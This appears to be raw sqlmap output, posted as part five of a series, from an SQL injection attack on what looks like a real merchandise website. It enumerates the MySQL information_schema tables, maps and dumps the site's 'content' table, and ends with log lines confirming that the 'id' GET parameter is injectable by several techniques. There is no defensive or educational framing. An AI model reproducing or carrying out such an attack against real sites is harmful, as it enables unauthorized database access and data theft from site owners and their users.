SQL Injection Part 5

1. Database: information_schema
2. [45 tables]
3. +---------------------------------------+
4. | CHARACTER_SETS |
5. | CLIENT_STATISTICS |
6. | COLLATIONS |
7. | COLLATION_CHARACTER_SET_APPLICABILITY |
8. | COLUMNS |
9. | COLUMN_PRIVILEGES |
10. | ENGINES |
11. | EVENTS |
12. | FILES |
13. | GLOBAL_STATUS |
14. | GLOBAL_VARIABLES |
15. | INDEX_STATISTICS |
16. | INNODB_BUFFER_PAGE |
17. | INNODB_BUFFER_PAGE_LRU |
18. | INNODB_BUFFER_POOL_STATS |
19. | INNODB_CMP |
20. | INNODB_CMPMEM |
21. | INNODB_CMPMEM_RESET |
22. | INNODB_CMP_RESET |
23. | INNODB_LOCKS |
24. | INNODB_LOCK_WAITS |
25. | INNODB_TRX |
26. | KEY_COLUMN_USAGE |
27. | PARAMETERS |
28. | PARTITIONS |
29. | PLUGINS |
30. | PROCESSLIST |
31. | PROFILING |
32. | REFERENTIAL_CONSTRAINTS |
33. | ROUTINES |
34. | SCHEMATA |
35. | SCHEMA_PRIVILEGES |
36. | SESSION_STATUS |
37. | SESSION_VARIABLES |
38. | STATISTICS |
39. | TABLES |
40. | TABLESPACES |
41. | TABLE_CONSTRAINTS |
42. | TABLE_PRIVILEGES |
43. | TABLE_STATISTICS |
44. | THREAD_STATISTICS |
45. | TRIGGERS |
46. | USER_PRIVILEGES |
47. | USER_STATISTICS |
48. | VIEWS |
49. +---------------------------------------+
50. Database: customra_crecontent
51. Table: content
52. [24 entries]
53. +------------------+
54. | tn |
55. +------------------+
56. | NULL |
57. | NULL |
58. | NULL |
59. | NULL |
60. | <div>\\?a0</div> |
61. | <div>\\?a0</div> |
62. | <div>\\?a0</div> |
63. | <div>\\?a0</div> |
64. | <div>\\?a0</div> |
65. | <div>\\?a0</div> |
66. | <div>\\?a0</div> |
67. | <div>\\?a0</div> |
68. | <div>\\?a0</div> |
69. | <div>\\?a0</div> |
70. | <div>\\?a0</div> |
71. | <div>\\?a0</div> |
72. | <div>\\?a0</div> |
73. | <div>\\?a0</div> |
74. | <div>\\?a0</div> |
75. | <div>\\?a0</div> |
76. | <div>\\?a0</div> |
77. | <div>\\?a0</div> |
78. | <div>\\?a0</div> |
79. | <div>\\?a0</div> |
80. +------------------+
81. Database: customra_crecontent
82. Table: content
83. [28 entries]
84. +-----+
85. | id |
86. +-----+
87. | 1 |
88. | 6 |
89. | 29 |
90. | 35 |
91. | 36 |
92. | 37 |
93. | 42 |
94. | 43 |
95. | 44 |
96. | 62 |
97. | 65 |
98. | 68 |
99. | 108 |
100. | 109 |
101. | 118 |
102. | 171 |
103. | 176 |
104. | 192 |
105. | 193 |
106. | 194 |
107. | 198 |
108. | 206 |
109. | 207 |
110. | 208 |
111. | 209 |
112. | 211 |
113. | 216 |
114. | 218 |
115. +-----+
116. Database: customra_crecontent
117. Table: content
118. [11 columns]
119. +------------+----------+
120. | Column | Type |
121. +------------+----------+
122. | category | text |
123. | date_a | text |
124. | fp | int(11) |
125. | id | int(11) |
126. | long_desc | longtext |
127. | notes | longtext |
128. | part | text |
129. | pic | text |
130. | price | text |
131. | short_desc | text |
132. | tn | text |
133. +------------+----------+
134. Database: customra_crecontent
135. [1 table]
136. +---------+
137. | content |
138. +---------+
139. [14:57:43] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="New Custom Race Engine quality sweatshirts.")
140. [14:57:43] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
141. [14:58:08] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
142. [14:58:22] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable